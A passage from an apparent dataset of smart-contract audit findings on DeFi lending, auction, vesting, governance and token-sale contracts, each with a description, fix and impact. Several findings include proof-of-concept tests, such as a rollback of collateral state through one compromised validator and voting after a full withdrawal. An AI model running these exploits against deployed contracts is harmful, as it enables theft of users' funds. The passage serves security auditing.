100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n +Validator threshold can be bypassed: a single compromised validator can update minter's state to historical state,medium,"The `updateCollateralValidatorThreshold` specifies the minimum number of validators needed to confirm the validity of `updateCollateral` data. However, just one compromised validator is enough to alter a minter's collateral status. In particular, this vulnerability allows the compromised validator to set the minter's state back to a historical state, allowing malicious minters to increase their collateral.\\nThe `updateCollateral()` function calls the `_verifyValidatorSignatures()` function, which calculates the minimum timestamp signed by all validators. This timestamp is then used to update the minter state's `_minterStates[minter_].updateTimestamp`. The constraint during this process is that the `_minterStates[minter_].updateTimestamp` must always be increasing.\\nFunction updateCollateral():\\n```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n\\nFunction _updateCollateral():\\n```\\n function _updateCollateral(address minter_, uint240 amount_, uint40 newTimestamp_) internal {\\n uint40 lastUpdateTimestamp_ = _minterStates[minter_].updateTimestamp;\\n\\n // MinterGateway already has more recent collateral update\\n if (newTimestamp_ <= lastUpdateTimestamp_) revert StaleCollateralUpdate(newTimestamp_, lastUpdateTimestamp_);\\n\\n _minterStates[minter_].collateral = amount_;\\n _minterStates[minter_].updateTimestamp = newTimestamp_;\\n }\\n```\\n\\nIf we have 1 compromised validator, its signature can be manipulated to any chosen timestamp. Consequently, this allows for control over the timestamp in `_minterStates[minter_].updateTimestamp` making it possible to update the minter's state to a historical state. An example is given in the following proof of concept. The key here is that even though `updateCollateralValidatorThreshold` may be set to 2 or even 3, as long as 1 validator is compromised, the attack vector would work, thus defeating the purpose of having a validator threshold.\\nProof Of Concept\\nIn this unit test, `updateCollateralInterval` is set to 2000 (default value). The `updateCollateralValidatorThreshold` is set to 2, and the `_validator1` is compromised. Following the steps below, we show how we update minter to a historical state:\\nInitial timestamp is `T0`.\\n100 seconds passed, the current timestamp is `T0+100`. Deposit 100e6 collateral at `T0+100`. `_validator0` signs signature at `T0+100`, and `_validator1` signs signature at `T0+1`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+1`.\\nAnother 100 seconds passed, the current timestamp is `T0+200`. Propose retrieval for all collateral, and perform the retrieval offchain. `_validator0` signs signature at `T0+200`, and `_validator1` signs signature at `T0+2`. After `updateCollateral()`, minter state collateral = 0, and updateTimestamp = `T0+2`.\\nAnother 100 seconds passed, the current timestamp is `T0+300`. Reuse `_validator0` signature from step 1, it is signed on timestamp `T0+100`. `_validator1` signs collateral=100e6 at `T0+3`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+3`.\\nNow, the minter is free to perform minting actions since his state claims collateral is 100e6, even though he has already retrieved it back in step 2. The mint proposal may even be proposed between step 1 and step 2 to reduce the mintDelay the minter has to wait.\\nAdd the following testing code to `MinterGateway.t.sol`. See more description in code comments.\\n```\\n function test_collateralStatusTimeTravelBySingleHackedValidator() external {\\n _ttgRegistrar.updateConfig(TTGRegistrarReader.UPDATE_COLLATERAL_VALIDATOR_THRESHOLD, bytes32(uint256(2)));\\n\\n // Arrange validator addresses in increasing order.\\n address[] memory validators = new address[](2);\\n validators[0] = _validator2;\\n validators[1] = _validator1;\\n\\n uint initialTimestamp = block.timestamp;\\n bytes[] memory cacheSignatures = new bytes[](2);\\n // 1. Deposit 100e6 collateral, and set malicious validator timestamp to `initialTimestamp+1` during `updateCollateral()`.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 1;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 1, _validator1Pk);\\n cacheSignatures = signatures;\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 1);\\n }\\n\\n // 2. Retrieve all collateral, and set malicious validator timestamp to `initialTimestamp+2` during `updateCollateral()`.\\n {\\n vm.prank(_minter1);\\n uint256 retrievalId = _minterGateway.proposeRetrieval(100e6);\\n\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory newRetrievalIds = new uint256[](1);\\n newRetrievalIds[0] = retrievalId;\\n\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 2;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), initialTimestamp + 2, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(0, newRetrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 0);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 2);\\n }\\n\\n // 3. Reuse signature from step 1, and set malicious validator timestamp to `initialTimestamp+3` during `updateCollateral()`.\\n // We have successfully ""travelled back in time"", and minter1's collateral is back to 100e6.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp - 200;\\n timestamps[1] = initialTimestamp + 3;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = cacheSignatures[0];\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 3, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 3);\\n }\\n }\\n```\\n","Use the maximum timestamp of all validators instead of minimum, or take the threshold-last minimum instead of the most minimum.","As shown in the proof of concept, the minter can use the extra collateral to mint M tokens for free.\\nOne may claim that during minting, the `collateralOf()` function checks for `block.timestamp < collateralExpiryTimestampOf(minter_)`, however, since during deployment `updateCollateralInterval` is set to 86400, that gives us enough time to perform the attack vector before ""fake"" collateral expires.","```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n" +Liquidation bonus scales exponentially instead of linearly.,medium,"Liquidation bonus scales exponentially instead of linearly.\\nLet's look at the code of `getLiquidationBonus`\\n```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n\\nAs we can see, the liquidation bonus is based on the entire `borrowAmount` and multiplied by the number of new loans added. The problem is that it is unfair when the user makes a borrow against multiple lenders.\\nIf a user takes a borrow for X against 1 lender, they'll have to pay a liquidation bonus of Y. However, if they take a borrow for 3X against 3 lenders, they'll have to pay 9Y, meaning that taking a borrow against N lenders leads to overpaying liquidation bonus by N times.\\nFurthermore, if the user simply does it in multiple transactions, they can avoid these extra fees (as they can simply call `borrow` for X 3 times and pay 3Y in Liquidation bonuses)",make liquidation bonus simply a % of totalBorrowed,Loss of funds,"```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n" +"When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.",medium,"When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.\\nThe function `wagmiLeverageFlashCallback` is used to handle the repayment operation after flash loan. After obtaining enough saleToken, it uses `_v3SwapExact` to convert the saleToken into holdToken. We know that the amount of holdTokens (holdTokenAmtIn) is proportional to the amount of saleTokens (amountToPay) obtained from flash loans. Later, the function will check the `holdTokenAmtIn` is no large than decodedData.holdTokenDebt.\\n```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n v3SwapExactParams({\\n isExactInput: false,\\n fee: decodedData.fee,\\n tokenIn: decodedData.holdToken,\\n tokenOut: decodedData.saleToken,\\n amount: amountToPay\\n })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n ? decodedData.amounts.amount1\\n : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n\\nIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan is `flashBalance`, which is the balance of the contract.\\n```\\n// Transfer the flashBalance to the recipient\\ndecodedData.saleToken.safeTransfer(decodedDataExt.recipient, flashBalance);\\n// Invoke the WagmiLeverage callback function with updated parameters\\nIWagmiLeverageFlashCallback(decodedDataExt.recipient).wagmiLeverageFlashCallback(\\n flashBalance,\\n interest,\\n decodedDataExt.originData\\n);\\n```\\n\\nNow let me describe how the attacker compromises the flash loans.\\nFirst, the attacker makes a donation to the `FlashLoanAggregator` contract before the victim performs a flash loan (using front-run). Then victim performs a flash loan, and he/she will get much more flashBalance than expected. Finally, in the function `wagmiLeverageFlashCallback`, the holdTokenAmtIn is larger than experted, which leads to fail.","In the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan should be the the balance difference during the flash loan period.",DOS,"```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n v3SwapExactParams({\\n isExactInput: false,\\n fee: decodedData.fee,\\n tokenIn: decodedData.holdToken,\\n tokenOut: decodedData.saleToken,\\n amount: amountToPay\\n })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n ? decodedData.amounts.amount1\\n : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n" +Highest bidder can withdraw his collateral due to a missing check in _cancelAllBids,high,"A bidder with the highest bid cannot cancel his bid since this would break the auction. A check to ensure this was implemented in `_cancelBid`.\\nHowever, this check was not implemented in `_cancelAllBids`, allowing the highest bidder to withdraw his collateral and win the auction for free.\\nThe highest bidder should not be able to cancel his bid, since this would break the entire auction mechanism.\\nIn `_cancelBid` we can find a require check that ensures this:\\n```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n\\nYet in `_cancelAllBids`, this check was not implemented.\\n```\\n * @notice Cancel bids for all rounds\\n */\\n function _cancelAllBids(uint256 tokenId, address bidder) internal {\\n EnglishPeriodicAuctionStorage.Layout\\n storage l = EnglishPeriodicAuctionStorage.layout();\\n\\n uint256 currentAuctionRound = l.currentAuctionRound[tokenId];\\n\\n for (uint256 i = 0; i <= currentAuctionRound; i++) {\\n Bid storage bid = l.bids[tokenId][i][bidder];\\n\\n if (bid.collateralAmount > 0) {\\n // Make collateral available to withdraw\\n l.availableCollateral[bidder] += bid.collateralAmount;\\n\\n // Reset collateral and bid\\n bid.collateralAmount = 0;\\n bid.bidAmount = 0;\\n }\\n }\\n }\\n```\\n\\nExample: User Bob bids 10 eth and takes the highest bidder spot. Bob calls `cancelAllBidsAndWithdrawCollateral`.\\nThe `_cancelAllBids` function is called and this makes all the collateral from all his bids from every round available to Bob. This includes the current round `<=` and does not check if Bob is the current highest bidder. Nor is `l.highestBids[tokenId][round].bidder` reset, so the system still has Bob as the highest bidder.\\nThen `_withdrawCollateral` is automatically called and Bob receives his 10 eth back.\\nThe auction ends. If Bob is still the highest bidder, he wins the auction and his bidAmount of 10 eth is added to the availableCollateral of the oldBidder.\\nIf there currently is more than 10 eth in the contract (ongoing auctions, bids that have not withdrawn), then the oldBidder can withdraw 10 eth. But this means that in the future a withdraw will fail due to this missing 10 eth.",Implement the require check from _cancelBid to _cancelAllBids.,"A malicious user can win an auction for free.\\nAdditionally, either the oldBidder or some other user in the future will suffer the loss.\\nIf this is repeated multiple times, it will drain the contract balance and all users will lose their locked collateral.","```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n" +User Can Vote Even When They Have 0 Locked Mento (Edge Case),medium,"There exists an edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote , this is depicted by a PoC to make things clearer.\\nThe flow to receiving voting power can be understood in simple terms as follows ->\\nUsers locks his MENTO and chooses a delegate-> received veMENTO which gives them(delegatee) voting power (there's cliff and slope at play too)\\nThe veMENTO is not a standard ERC20 , it is depicted through ""lines"" , voting power declines ( ie. slope period) with time and with time you can withdraw more of your MENTO.\\nThe edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote is as follows ->\\n1.) User has locked his MENTO balance in the Locking.sol\\n2.) The owner of the contract ""stops"" the contract for some emergency reason.\\n4.) Since the contract is stopped , the `getAvailableForWithdraw` will return the entire locked amount of the user as withdrawable\\n```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n\\n5.) The user receives his entire locked amount in L101.\\n6.) The owner ""start()"" the contract again\\n7.) Since the user's veMENTO power was not effected by the above flow , there still exists veMENTO a.k.a voting power to the delegate, and the user's delegate is still able to vote on proposals (even when the user has withdrew everything).\\nPOC\\nImport console log first in the file , paste this test in the `GovernanceIntegration.t.sol`\\n```\\nfunction test_Poc_Stop() public {\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(alice, 10_000e18);\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(bob, 10_000e18);\\n\\n vm.prank(alice);\\n locking.lock(alice, alice, 10_000e18, 1, 103);\\n\\n vm.prank(bob);\\n locking.lock(bob, bob, 1500e18, 1, 103);\\n\\n vm.timeTravel(BLOCKS_DAY);\\n\\n uint256 newVotingDelay = BLOCKS_DAY;\\n uint256 newVotingPeriod = 2 * BLOCKS_WEEK;\\n uint256 newThreshold = 5000e18;\\n uint256 newQuorum = 10; //10%\\n uint256 newMinDelay = 3 days;\\n uint32 newMinCliff = 6;\\n uint32 newMinSlope = 12;\\n\\n vm.prank(alice);\\n (\\n uint256 proposalId,\\n address[] memory targets,\\n uint256[] memory values,\\n bytes[] memory calldatas,\\n string memory description\\n ) = Proposals._proposeChangeSettings(\\n mentoGovernor,\\n governanceTimelock,\\n locking,\\n newVotingDelay,\\n newVotingPeriod,\\n newThreshold,\\n newQuorum,\\n newMinDelay,\\n newMinCliff,\\n newMinSlope\\n );\\n\\n // ~10 mins\\n vm.timeTravel(120);\\n\\n \\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.stop();\\n vm.stopPrank();\\n\\n uint bal2 = mentoToken.balanceOf(alice);\\n console.log(bal2);\\n\\n vm.startPrank(alice);\\n locking.withdraw();\\n vm.stopPrank();\\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.start();\\n vm.stopPrank();\\n\\n uint bal = mentoToken.balanceOf(alice);\\n console.log(bal);\\n vm.prank(alice);\\n \\n\\n console.log(mentoGovernor.castVote(proposalId, 1));\\n }\\n```\\n\\nYou can see the Alice withdrew her entire locked amount and still was able to caste her vote.",When the entire amount is withdrawn adjust the logic to remove the corresponding lines for the delegator.,User still able to vote even when the entire locked amount is withdrawn.,"```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n" +Auction fails if the 'Honorarium Rate' is 0%,medium,"The Honorarium Rate is the required percentage of a winning Auction Pitch bid that the Steward makes to the Creator Circle at the beginning of each Stewardship Cycle.\\n`$$ Winning Bid * Honorarium Rate = Periodic Honorarium $$`\\nTo mimic the dynamics of private ownership, the Creator Circle may choose a 0% Honorarium Rate. However, doing so breaks the functionality of the protocol.\\nTo place a bid, a user must call the `placeBid` function in `EnglishPeriodicAuctionFacet.sol` and deposit collateral(collateralAmount) equal to `bidAmount + feeAmount`. The `feeAmount` here represents the Honorarium Rate mentioned above. The `placeBid` function calls the `_placeBid` internal function in `EnglishPeriodicAuctionInternal.sol` which calculates the `totalCollateralAmount` as follows :\\n```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n\\nHere, `bid.collateralAmount` is the cumulative collateral deposited by the bidder in previous bids during the current auction round(i.e, zero if no bids were placed), and `collateralAmount` is the collateral to be deposited to place the bid. However the `_placeBid` function requires that `totalCollateralAmount` is strictly greater than `bidAmount` if the bidder is not the current owner of the Stewardship License. This check fails when the `feeAmount` is zero and this causes a Denial of Service to users trying to place a bid. Even if the users try to bypass this by depositing a value slightly larger than `bidAmount`, the `_checkBidAmount` function would still revert with `'Incorrect bid amount'`\\nPOC\\nThe following test demonstrates the above-mentioned scenario :\\n```\\n describe('exploit', function () {\\n it('POC', async function () {\\n // Auction start: Now + 100\\n // Auction end: Now + 400\\n const instance = await getInstance({\\n auctionLengthSeconds: 300,\\n initialPeriodStartTime: (await time.latest()) + 100,\\n licensePeriod: 1000,\\n });\\n const licenseMock = await ethers.getContractAt(\\n 'NativeStewardLicenseMock',\\n instance.address,\\n );\\n\\n // Mint token manually\\n const steward = bidder2.address;\\n await licenseMock.mintToken(steward, 0);\\n\\n // Start auction\\n await time.increase(300);\\n \\n const bidAmount = ethers.utils.parseEther('1.0');\\n const feeAmount = await instance.calculateFeeFromBid(bidAmount);\\n const collateralAmount = feeAmount.add(bidAmount);\\n\\n // Reverts when a user tries to place a bid\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount })).to.be.revertedWith('EnglishPeriodicAuction: Collateral must be greater than current bid');\\n\\n \\n \\n const extraAmt = ethers.utils.parseEther('0.1');\\n const collateralAmount1 = feeAmount.add(bidAmount).add(extraAmt);\\n \\n // Also reverts when the user tries to deposit collateral slighty greater than bid amount\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount1 })).to.be.revertedWith('EnglishPeriodicAuction: Incorrect bid amount'); \\n \\n // Only accepts a bid from the current steward\\n \\n await expect( instance\\n .connect(bidder2)\\n .placeBid(0, bidAmount, { value: 0 })).to.not.be.reverted;\\n\\n });\\n });\\n```\\n\\nTo run the test, copy the code above to `EnglishPeriodicAuction.ts` and alter L#68 as follows :\\n```\\n// Remove the line below\\n [await owner.getAddress(), licensePeriod, 1, 10],\\n// Add the line below\\n [await owner.getAddress(), licensePeriod, 0, 10],\\n```\\n\\nRun `yarn run hardhat test --grep 'POC'`","Alter EnglishPeriodicAuctionInternal.sol::L#330 as follows :\\n```\\n// Remove the line below\\n totalCollateralAmount > bidAmount,\\n// Add the line below\\n totalCollateralAmount >= bidAmount, \\n```\\n",The protocol becomes dysfunctional in such a scenario as users as DOS'd from placing a bid.,```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n +Currently auctioned NFTs can be transferred to a different address in a specific edge case,medium,"Currently auctioned NFTs can be transferred to a different address in a specific edge case, leading to theft of funds.\\nThe protocol assumes that an NFT cannot change owner while it's being auctioned, this is generally the case but there is an exception, an NFT can change owner via mintToken() while an auction is ongoing when all the following conditions apply:\\nAn NFT is added `to` the collection without being minted (ie. `to` set `to` address(0)).\\nThe NFT is added `to` the collection with the parameter `tokenInitialPeriodStartTime[]` set `to` a timestamp lower than `l.initialPeriodStartTime` but bigger than 0(ie. `0` < `tokenInitialPeriodStartTime[]` < l.initialPeriodStartTime).\\nThe current `block.timestamp` is in-between `tokenInitialPeriodStartTime[]` and `l.initialPeriodStartTime`.\\nA malicious `initialBidder` can take advantage of this by:\\nBidding on the new added NFT via placeBid().\\nCalling mintToken() to transfer the NFT to a different address he controls.\\nClosing the auction via closeAuction()\\nAt point `3.`, because the NFT owner changed, the winning bidder (ie. initialBidder) is not the current NFT owner anymore. This will trigger the following line of code:\\n```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n\\nWhich increases the `availableCollateral` of the `oldBidder` (ie. the address that owns the NFT after point 2.) by `bidAmount` of the highest bid. But because at the moment the highest bid was placed `initialBidder` was also the NFT owner, he only needed to transfer the `ETH` fee to the protocol instead of the whole bid amount.\\nThe `initialBidder` is now able to extract ETH from the protocol via the address used in point `2.` by calling withdrawCollateral() while also retaining the NFT license.",Don't allow `tokenInitialPeriodStartTime[]` to be set at a timestamp beforel.initialPeriodStartTime.,"Malicious initial bidder can potentially steal ETH from the protocol in an edge case. If the `ADD_TOKEN_TO_COLLECTION_ROLE` is also malicious, it's possible to drain the protocol.",```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n +Tax refund is calculated based on the wrong amount,high,"Tax refund is calculated based on the wrong amount\\nAfter the private period has finished, users can claim a tax refund, based on their max tax free allocation.\\n```\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim"");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n\\nThe problem is that in case `s.share > taxFreeAllc`, the tax refund is calculated wrongfully. Not only it should refund the tax on the unused USDC amount, but it should also refund the tax for the tax-free allocation the user has.\\nImagine the following.\\nUser deposits 1000 USDC.\\nPrivate period finishes, token oversells. Only half of the user's money actually go towards the sell (s.share = 500 USDC, s.left = 500 USDC)\\nThe user has 400 USDC tax-free allocation\\nThe user must be refunded the tax for the 500 unused USDC, as well as their 400 USDC tax-free allocation. In stead, they're only refunded for the 500 unused USDC. (note, if the user had 500 tax-free allocation, they would've been refunded all tax)",change the code to the following:\\n```\\n refundTaxAmount = ((left + taxFreeAllc) * tax) / POINT_BASE;\\n```\\n,Users are not refunded enough tax,"```\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim"");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n" +"Vesting contract cannot work with ETH, although it's supposed to.",medium,"Vesting contract cannot work with native token, although it's supposed to.\\nWithin the claim function, we can see that if `token` is set to address(1), the contract should operate with ETH\\n```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(""""); // @audit - here\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nHowever, it is actually impossible for the contract to operate with ETH, since `updateUserDeposit` always attempts to do a token transfer.\\n```\\n function updateUserDeposit(\\n address[] memory _users,\\n uint256[] memory _amount\\n ) public onlyRole(DEFAULT_ADMIN_ROLE) {\\n require(_users.length <= 250, ""array length should be less than 250"");\\n require(_users.length == _amount.length, ""array length should match"");\\n uint256 amount;\\n for (uint256 i = 0; i < _users.length; i++) {\\n userdetails[_users[i]].userDeposit = _amount[i];\\n amount += _amount[i];\\n }\\n token.safeTransferFrom(distributionWallet, address(this), amount); // @audit - this will revert\\n }\\n```\\n\\nSince when the contract is supposed to work with ETH, token is set to address(1), calling `safeTransferFrom` on that address will always revert, thus making it impossible to call this function.","make the following check\\n```\\n if (address(token) != address(1)) token.safeTransferFrom(distributionWallet, address(this), amount);\\n```\\n",Vesting contract is unusable with ETH,"```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(""""); // @audit - here\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n" +"If token does not oversell, users cannot claim tax refund on their tax free allocation.",high,"Users may not be able to claim tax refund\\nWithin TokenSale, upon depositing users, users have to pay tax. Then, users can receive a tax-free allocation - meaning they'll be refunded the tax they've paid on part of their deposit.\\nThe problem is that due to a unnecessary require check, users cannot claim their tax refund, unless the token has oversold.\\n```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, ""TokenSale: No Deposit""); \\n require(!s.claimed, ""TokenSale: Already Claimed"");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim""); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n 